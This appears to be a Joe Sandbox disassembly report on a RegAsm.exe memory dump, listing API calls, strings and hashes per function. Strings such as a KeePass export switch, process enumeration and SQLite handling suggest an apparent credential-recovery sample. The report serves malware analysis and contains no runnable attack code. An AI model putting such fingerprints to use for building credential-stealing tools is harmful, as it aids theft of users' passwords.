                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                  • String ID: ---
                                                                                  • API String ID: 3437578500-2854292027
                                                                                  • Opcode ID: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                                                  • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                                  • Opcode Fuzzy Hash: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                                                  • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 0041087D
                                                                                  • memset.MSVCRT ref: 00410892
                                                                                  • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                  • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                  • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                  • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                  • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                  • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                  • GetSysColor.USER32(0000000F), ref: 00410999
                                                                                  • DeleteObject.GDI32(?), ref: 004109D0
                                                                                  • DeleteObject.GDI32(?), ref: 004109D6
                                                                                  • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                  • String ID:
                                                                                  • API String ID: 1010922700-0
                                                                                  • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                  • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                                  • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                  • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                                  APIs
                                                                                    • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                  • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                  • malloc.MSVCRT ref: 004186B7
                                                                                  • free.MSVCRT ref: 004186C7
                                                                                  • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                                  • free.MSVCRT ref: 004186E0
                                                                                  • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                                  • malloc.MSVCRT ref: 004186FE
                                                                                  • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                                  • free.MSVCRT ref: 00418716
                                                                                  • free.MSVCRT ref: 0041872A
                                                                                  • free.MSVCRT ref: 00418749
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: free$FullNamePath$malloc$Version
                                                                                  • String ID: |A
                                                                                  • API String ID: 3356672799-1717621600
                                                                                  • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                                  • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                                  • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                                  • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcsicmp
                                                                                  • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                  • API String ID: 2081463915-1959339147
                                                                                  • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                  • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                                  • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                  • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                                  APIs
                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                  • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                  • API String ID: 2012295524-70141382
                                                                                  • Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                                  • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                                  • Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                                  • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                                  • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                                                  • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                                  • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                                  • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                                  • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$HandleModule
                                                                                  • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                  • API String ID: 667068680-3953557276
                                                                                  • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                  • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                                  • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                  • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                                  APIs
                                                                                  • GetDC.USER32(00000000), ref: 004121FF
                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                  • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                  • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                  • SelectObject.GDI32(?,?), ref: 00412251
                                                                                  • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                  • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                    • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                    • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                    • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                  • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                  • SetCursor.USER32(00000000), ref: 004122BC
                                                                                  • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                  • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                  • String ID:
                                                                                  • API String ID: 1700100422-0
                                                                                  • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                  • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                                  • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                  • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                                  APIs
                                                                                  • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                  • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                  • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                  • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                  • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                  • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                  • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                  • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                  • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                  • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                  • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                  • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                  • String ID:
                                                                                  • API String ID: 552707033-0
                                                                                  • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                  • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                                  • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                  • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: memset$_snwprintf
                                                                                  • String ID: %%0.%df
                                                                                  • API String ID: 3473751417-763548558
                                                                                  • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                  • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                                  • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                  • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                                  APIs
                                                                                  • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                  • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                  • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                  • GetTickCount.KERNEL32 ref: 0040610B
                                                                                  • GetParent.USER32(?), ref: 00406136
                                                                                  • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                  • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                  • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                  • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                  • String ID: A
                                                                                  • API String ID: 2892645895-3554254475
                                                                                  • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                  • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                                  • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                  • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                                  APIs
                                                                                    • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                    • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                    • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                  • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                                  • strchr.MSVCRT ref: 0040C140
                                                                                  • strchr.MSVCRT ref: 0040C151
                                                                                  • _strlwr.MSVCRT ref: 0040C15F
                                                                                  • memset.MSVCRT ref: 0040C17A
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: Filememcpystrchr$CloseHandlePointerSize_memicmp_strlwrmemset
                                                                                  • String ID: 4$h
                                                                                  • API String ID: 4019544885-1856150674
                                                                                  • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                  • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                                  • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                  • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                  • String ID: 0$6
                                                                                  • API String ID: 4066108131-3849865405
                                                                                  • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                  • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                                  • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                  • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 004082EF
                                                                                    • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                  • memset.MSVCRT ref: 00408362
                                                                                  • memset.MSVCRT ref: 00408377
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: memset$ByteCharMultiWide
                                                                                  • String ID:
                                                                                  • API String ID: 290601579-0
                                                                                  • Opcode ID: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                                                                  • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                                  • Opcode Fuzzy Hash: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                                                                  • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: free$wcslen
                                                                                  • String ID:
                                                                                  • API String ID: 3592753638-3916222277
                                                                                  • Opcode ID: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                                                  • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                                  • Opcode Fuzzy Hash: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                                                  • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 0040A47B
                                                                                  • _snwprintf.MSVCRT ref: 0040A4AE
                                                                                  • wcslen.MSVCRT ref: 0040A4BA
                                                                                  • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                  • wcslen.MSVCRT ref: 0040A4E0
                                                                                  • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcpywcslen$_snwprintfmemset
                                                                                  • String ID: %s (%s)$YV@
                                                                                  • API String ID: 3979103747-598926743
                                                                                  • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                  • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                                  • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                  • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                                  APIs
                                                                                  • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                  • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                  • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: Library$AddressFreeLoadMessageProc
                                                                                  • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                  • API String ID: 2780580303-317687271
                                                                                  • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                  • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                                  • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                  • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                                  APIs
                                                                                  • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                                                  • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                                                  • wcslen.MSVCRT ref: 0040A6B1
                                                                                  • wcscpy.MSVCRT ref: 0040A6C1
                                                                                  • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                                                  • wcscpy.MSVCRT ref: 0040A6DB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                  • String ID: Unknown Error$netmsg.dll
                                                                                  • API String ID: 2767993716-572158859
                                                                                  • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                  • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                                  • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                  • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                                  APIs
                                                                                  Strings
                                                                                  • unable to open database: %s, xrefs: 0042F84E
                                                                                  • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                  • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                  • too many attached databases - max %d, xrefs: 0042F64D
                                                                                  • database %s is already in use, xrefs: 0042F6C5
                                                                                  • database is already attached, xrefs: 0042F721
                                                                                  • out of memory, xrefs: 0042F865
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcpymemset
                                                                                  • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                  • API String ID: 1297977491-2001300268
                                                                                  • Opcode ID: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                                  • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                                  • Opcode Fuzzy Hash: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                                  • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                                  APIs
                                                                                  • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                                  • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                                  • GetLastError.KERNEL32 ref: 004178FB
                                                                                  • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$ErrorLastLockSleepUnlock
                                                                                  • String ID:
                                                                                  • API String ID: 3015003838-0
                                                                                  • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                  • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                                  • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                  • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                  • wcscpy.MSVCRT ref: 0040D1B5
                                                                                    • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                    • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                  • wcslen.MSVCRT ref: 0040D1D3
                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                  • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                  • memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                    • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                                    • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                                    • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                                    • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                                                  Strings
